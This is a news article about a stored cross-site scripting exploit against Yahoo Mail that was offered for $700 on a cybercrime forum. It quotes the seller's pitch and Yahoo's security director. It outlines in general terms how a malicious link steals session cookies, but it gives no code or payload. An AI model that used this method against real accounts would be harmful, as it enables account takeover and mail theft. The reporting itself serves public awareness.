FILED UNDER ,

Yahoo Mail hijacking exploit selling for $700

XSS vulnerability allows attacks to steal and replace tracking cookies, as well as read and send e-mail from a victim’s account.

An exploit selling for $700 may put millions of Yahoo Mail users at risk of having their e-mail account hijacked and their browsers redirected to malicious sites.

Marketed by an allegedly Egyptian hacker on a cybercrime forum, the exploit targets a cross-site scripting (XSS) vulnerability in Yahoo.com that allows attackers to steal and replace tracking cookies, as well as read and send e-mail from a victim’s account. Typically, an attacker will encode a malicious link in e-mails; the script is executed when the unsuspecting recipient clicks on the link, allowing access to the cookies and other sensitive information.

“After the victim clicks the link, he will be redirected to the e-mail page again,” the hacker, who goes by the handle TheHell, said in a demonstration video for the hack (see below). “And you can redirect him to wherever you want.”

“I’m selling Yahoo stored xss that steal Yahoo emails cookies and works on ALL browsers,” the hacker explained. “And you don’t need to bypass IE or Chrome xss filter as it do that itself because it’s stored xss. Prices around for such exploit is $1,100 – $1,500, while I offer it here for $700. Will sell only to trusted people cuz I don’t want it to be patched soon!”

Meanwhile, Yahoo tells KrebsOnSecurity.comthat while the hole can be easily patched, the challenge lies in locating the hole.

“Fixing it is easy,” Yahoo Director of Security Ramses Martinez told KrebsOnSecurity. “Once we figure out the offending URL, we can have new code deployed in a few hours.”

The vendor says this XSS flaw falls into the category of a stored vulnerability, which inserts malicious code into a file, database, or back-end system. The malicious script is then retrieved from the server when it requests the stored information.

 

Please share your comments on  our Facebook page and also follow me on Twitter and Google+
Follow Me on Pinterest

DISCUSS 0

Leave a Reply